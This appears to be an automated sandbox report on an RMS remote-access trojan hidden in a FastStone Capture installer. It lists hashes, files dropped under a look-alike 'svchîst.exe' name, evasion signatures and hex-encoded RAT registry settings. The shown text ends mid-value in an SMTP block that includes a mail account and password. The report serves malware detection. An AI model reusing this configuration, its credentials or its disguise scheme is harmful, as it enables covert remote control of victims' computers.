memory/1152-170-0x0000000000000000-mapping.dmp

memory/1860-171-0x0000000000000000-mapping.dmp

memory/4276-172-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

MD5 8708699d2c73bed30a0a08d80f96d6d7
SHA1 684cb9d317146553e8c5269c8afb1539565f4f78
SHA256 a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f
SHA512 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

C:\Users\Admin\AppData\Roaming\FastStone\FSC\fsc.db

MD5 a979f58d3ece3f44d6572a44efb4a0cc
SHA1 2ac4dbb1994f4b3ef9c13445734f9c16843b140b
SHA256 9ebc76ead646faf16af6605a7d7a8a5c5a3ccf9b9e2ca6628381a5da2b26a87e
SHA512 9bbe07357c6ec4e7eb66acb4b068e1dccd4d73b7fd88d07a4c664ea4501bf3e581bdfe3a221a187ef242570a8733eef5b5227c14f365b1fd79a4f40a17c1c471

memory/3816-176-0x0000000000000000-mapping.dmp

memory/4472-175-0x0000000000000000-mapping.dmp

memory/1820-178-0x0000000000000000-mapping.dmp

memory/452-177-0x0000000000000000-mapping.dmp

memory/2424-180-0x0000000000000000-mapping.dmp

memory/3904-179-0x0000000000000000-mapping.dmp

memory/2516-181-0x0000000000000000-mapping.dmp

memory/4440-182-0x0000000000000000-mapping.dmp

memory/4348-184-0x0000000000000000-mapping.dmp

memory/388-183-0x0000000000000000-mapping.dmp

memory/5096-185-0x0000000000000000-mapping.dmp

memory/1756-186-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

memory/4584-192-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

memory/1120-196-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/2252-204-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\idfgvgjnghcdfb.reg

MD5 7b5e1d30e89e0ef1c86fecb977131673
SHA1 78df83f3256df2efbe483d182d4cc13afe99be2b
SHA256 b114302cfede0f574362385c4949dde34c544b5213a239908299588f00b0bd80
SHA512 eae8f24f30b8dac2d0944fb702aca9c6ca30a5d3ffb6a4191afec47af1f59a50bbaa00d11b07976f485c58839f1927695655a69ff81807ca123026dd2e84b719

memory/1940-206-0x0000000000000000-mapping.dmp

memory/3768-207-0x0000000000000000-mapping.dmp

memory/3900-208-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/1612-209-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

Analysis: behavioral1

Detonation Overview

Submitted

2022-04-27 17:37

Reported

2022-04-27 19:29

Platform

win7-20220414-en

Max time kernel

150s

Max time network

174s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe"

Signatures

RMS

trojan rat rms

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\libeay32.dll C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A

Modifies Windows Firewall

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\attrib.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\FastStone Capture\FSCaptureHelp.chm C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCrossHair.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSLogo.png C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSRecorder.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSRecorder.LANG C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCapture.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSFocus.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCapture.LANG C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3536322d3633312d3539302d3830323c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a7